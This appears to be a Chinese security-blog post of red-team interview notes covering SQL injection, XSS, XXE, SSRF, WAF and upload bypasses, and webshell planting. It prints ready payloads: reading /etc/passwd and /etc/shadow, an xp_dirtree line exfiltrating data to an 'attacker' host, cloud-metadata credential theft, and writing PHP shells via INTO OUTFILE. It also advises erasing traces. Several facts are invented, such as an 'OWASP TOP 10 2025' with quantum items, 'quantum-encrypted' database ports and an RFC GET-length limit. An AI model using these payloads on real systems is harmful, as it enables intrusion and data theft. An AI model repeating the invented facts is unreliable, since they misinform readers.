安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年HW(护网面试) 08
1、渗透测试简要流程 2、绕过WAF常用方法 3、SQL注入常见Payload 4、XSS种类、弹窗函数、绕过方法 5、XXE漏洞原理 6、列举OWASP TOP10 7、SQL注入常用函数 8、.XSS和CSRF的区别 9、常见的中间件 10、文件上传怎么绕过 11、反序列化的原理 12、数据库预处理怎么突破 13、httponly 14、SQL注入如何拿GetShel 15、oracle、mysql、sqlserver默认端口 16、SSRF 17、常见Web安全漏洞 18、MYSQL注入5.0以上和5.0以下有什么区别 19、get传参和post传参的区别
一、渗透测试六步流程
mermaid
graph LR A[信息收集] --> B[漏洞扫描] B --> C[漏洞利用] C --> D[权限提升] D --> E[横向移动] E --> F[痕迹清理]
- 信息收集
- 子域名爆破(Amass)
- 端口服务扫描(Nmap深度指纹识别)
- 漏洞利用
- 优先使用无文件攻击降低WAF检测率
- 痕迹清理
- 使用MemfDump清除内存痕迹
二、WAF绕过五大技法
类型 方法实例 2025年有效性 混淆绕过 <img/src=1 onerror=alert(1)>
★★★★☆ 协议层绕过 HTTP分块传输+畸形报文 ★★★★★ 编码绕过 ㊙️→UTF-7→ +AGYAbwBy-
★★★☆☆ 资源限制绕过 低频慢速攻击(1req/5min) ★★★★☆ 规则盲区 利用云WAF未覆盖的API网关路径 ★★★★★
三、SQL注入经典Payload
爆破类:
sql
' OR 1=1-- UNION SELECT @@version,LOAD_FILE('/etc/passwd')#
时间盲注:
sql
IF(SUBSTR(database(),1,1)='a',SLEEP(5),0)
带外攻击:
sql
DECLARE @q VARCHAR(100)=\\attacker\$(SELECT TOP 1 column_name FROM information_schema.columns); EXEC xp_dirtree @q; --
四、XSS攻防体系
三大类型:
- 反射型:URL参数未过滤直接输出
- 存储型:恶意脚本存入数据库(如评论区)
- DOM型:前端JS操作未消毒(
eval(location.hash)
)弹窗函数:
javascript
alert(); prompt(); confirm(); // 基础 open(); print(); // 高级绕过
绕过方法:
- Unicode混淆:
\u0061lert()
- HTML实体分割:
<script>
- 事件处理劫持:
<svg/onload=alert
>
五、XXE漏洞原理
攻击流程:
mermaid
sequenceDiagram 攻击者->>服务器: 发送恶意XML 服务器->>外部实体: 解析ENTITY引用 外部实体-->>服务器: 返回敏感文件内容 服务器->>攻击者: 在报错/响应中泄漏数据
利用场景:
- 读取服务器文件:
<!ENTITY xxe SYSTEM "file:///etc/shadow">
- SSRF攻击:
<!ENTITY xxe SYSTEM "http://169.254.169.254/">
六、OWASP TOP 10 2025
- 注入漏洞(SQLi/NoSQLi)
- AI供应链攻击(第三方模型污染)
- 量子安全缺口(RSA算法脆弱性)
- 云配置错误(桶策略开放)
- 自动化漏洞(API未授权访问)
→ 完整TOP10见OWASP官网年度报告
七、SQL注入关键函数
数据库 信息获取函数 文件操作函数 MySQL database()
LOAD_FILE()
Oracle SELECT banner FROM v$version
UTL_FILE.FOPEN()
SQL Server @@VERSION
xp_cmdshell
八、XSS与CSRF的本质区别
diff
+ XSS:客户端脚本执行漏洞 - 目标:用户浏览器 - 效果:窃取会话/挂马 - CSRF:跨站请求伪造 - 目标:Web应用服务端 - 效果:以用户身份执行操作(如转账)
九、中间件漏洞热榜
- Nginx:
- CVE-2025-1100 路径遍历(已修补)
- Apache:
- ModSecurity规则绕过(通配符.*失效)
- IIS:
- 短文件名暴力枚举(2025年仍存在)
十、文件上传绕过技术
三层绕过矩阵:
防御层 绕过方法 前端校验 Burp修改Content-Type为image/png 后端校验 添加PNG文件头+PHP恶意代码 执行拦截 .htaccess设置解析规则( AddType application/x-httpd-php .test
)
十一、反序列化漏洞原理
攻击链:
用户输入 → 未过滤反序列化 → 触发类魔法方法(__wakeup/destruct)→ RCE
高危库:
- Java:Apache Commons Collections
- Python:Pickle模块
- PHP:unserialize() + Phar协议
十二、预处理突破方法
- 二次注入:
- 先存入恶意数据 → 后触发查询
- 预编译逃逸:
- MySQL的
\
转义符绕过(CVE-2024-22205)- 非文本列注入:
- JSON/XML字段未预处理
十三、HttpOnly防御机制
http
Set-Cookie: SESSION=abcd1234; HttpOnly; Secure; SameSite=Strict
- ✅ 阻止
document.cookie
读取- ✅ 抵御90%的XSS窃Cookie攻击
- ❌ 无法防护CSRF(需配合Token)
十四、SQL注入GetShell路径
- 写文件:
sql
SELECT '<?php system($_GET[0]); ?>' INTO OUTFILE '/var/www/shell.php'
- 日志篡改:
sql
SET global general_log_file='/var/www/shell.php';
- 插件利用:
sql
CREATE UDF 'sys_exec' RETURNS INT SONAME 'udf.so';
十五、数据库默认端口
数据库 默认端口 加密端口(2025标准) MySQL 3306 33060(TLS 1.3) Oracle 1521 2484(量子加密) SQL Server 1433 14333(AES-256)
十六、SSRF漏洞升级攻击
新型利用方式:
- 云元数据攻击:
http://169.254.169.254/latest/meta-data/iam/security-credentials/
- 穿透防火墙:
利用gopher协议发送内网Redis命令- DNS重绑定:
5秒TTL切换域名解析到内网IP
十七、Web安全漏洞TOP8
- 注入漏洞(SQL/OS/NoSQL)
- 认证失效(JWT密钥硬编码)
- 敏感数据泄露(GitHub令牌残留)
- XXE(XML解析器配置错误)
- 访问控制缺失(水平越权)
- 安全配置错误(K8s RBAC配置)
- CSRF(敏感操作无Token)
- 老旧组件(Log4j 2.x未更新)
十八、MySQL注入版本差异
特性 5.0以下 5.0以上 数据库名获取 暴力猜解 information_schema
联合查询列数 手动探测 ORDER BY直接判断 报错信息 基础错误 详细泄露路径 文件读写权限 默认禁用 secure_file_priv控制
十九、GET与POST传参对比
properties
# GET请求 method = "GET" 参数位置 = URL可见 缓存机制 = 浏览器主动缓存 长度限制 = 2048字符(RFC标准) # POST请求 method = "POST" 参数位置 = Body隐藏 安全场景 = 密码/文件上传 长度限制 = 理论无上限(服务器约束)